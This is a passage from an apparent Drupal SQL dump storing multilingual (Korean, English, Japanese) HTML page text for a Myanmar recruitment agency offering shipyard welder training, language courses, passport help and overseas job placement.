Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요하는 &nbsp; &nbsp; &nbsp; &nbsp; 경우에&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">컴퓨터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">많은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">과정들과 연결하고 취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를 하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; 7. 상기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\">&nbsp; </span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">IRIS(International Recruitment Integrity System)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">윤리적</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">채용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공정한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노동</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관행 &nbsp; &nbsp; &nbsp; 의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">마련하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공합니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 24, 183, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 183, 'ja', 0, '<p class=\"MsoNormal\">1.&nbsp;<span style=\"mso-spacerun:yes;\"> </span><span lang=\"JA\">ニューコメットトレンディグエイジェンシーでは韓国の造船所で</span>E 7-3 Visa<span lang=\"JA\">で働きたいミャンマー全国から民族 &nbsp; &nbsp; &nbsp;問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介 &nbsp; &nbsp; &nbsp;をしております。</span><o:p></o:p></p><p class=\"MsoNormal\">2. <span lang=\"JA\">海外に勤める際使えるそれぞれの国の言葉が勉強できる学校も開いております。</span>(<span lang=\"JA\">現在日本語学校、韓国語学校</span>)<o:p></o:p></p><p class=\"MsoNormal\">3 .<span lang=\"JA\">パスポート作成サービス</span><o:p></o:p></p><p class=\"MsoNormal\">4. <span lang=\"JA\">日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp; &nbsp; &nbsp; &nbsp;取り込んでおります。</span><o:p></o:p></p><p>5.<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT,<span style=\"mso-spacerun:yes;\">&nbsp;</span>NAT-TEST, TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">の</span>N3,N2<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">以上の合格者達にはワークビザである</span><o:p></o:p>:</p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">通訳、翻訳</span><o:p></o:p></p><p>• IT<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">事業</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">エンジニアに関する事業</span><span style=\"mso-spacerun:yes;\">&nbsp;</span>(Civil,Mechanical,EP,EC,Auto Card<span style=\"font-family:&quot;MS Gothic&quot;;mso-bidi-font-family:&quot;MS Gothic&quot;;\">など</span>)<o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-fareast-language:JA;\" lang=\"JA\">実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">車修理関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">工業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">建築業関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">食品関係</span><o:p></o:p></p><p>• &nbsp;<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">レストラン</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">ホテル関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">衣類関係</span><o:p></o:p></p><p>• <span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">農業関係</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">漁業関係の工場</span><o:p></o:p></p><p>&nbsp;•<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">介護関係&nbsp;</span><span style=\"font-family:&quot;MS Mincho&quot;;font-size:9.5pt;mso-bidi-font-family:&quot;MS Mincho&quot;;mso-bidi-font-size:10.0pt;\">{Training Visa)</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\">6.<span lang=\"JA\">ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp; &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビ &nbsp; &nbsp; &nbsp; ースをしております。</span><o:p></o:p></p><p><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">7. &nbsp;</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">上記のサービスを</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">International Recruitment Integrity System(IRIS)</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">が定めた</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\">Ethical Recruitment and Fair Labour Practices</span><span style=\"font-family:&quot;Yu Mincho&quot;,serif;font-size:10.5pt;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-font-size:11.0pt;mso-bidi-language:AR-SA;mso-bidi-theme-font:minor-bidi;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">に &nbsp; &nbsp; &nbsp;合った基準で管理しております。</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 183, 'ko', 0, '<ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 한국 조선소에서</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> E-7-3 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접공</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 외국에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일할 때 직장에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어려움을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">겪지</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">않도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직장에 사용하는 기본</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span 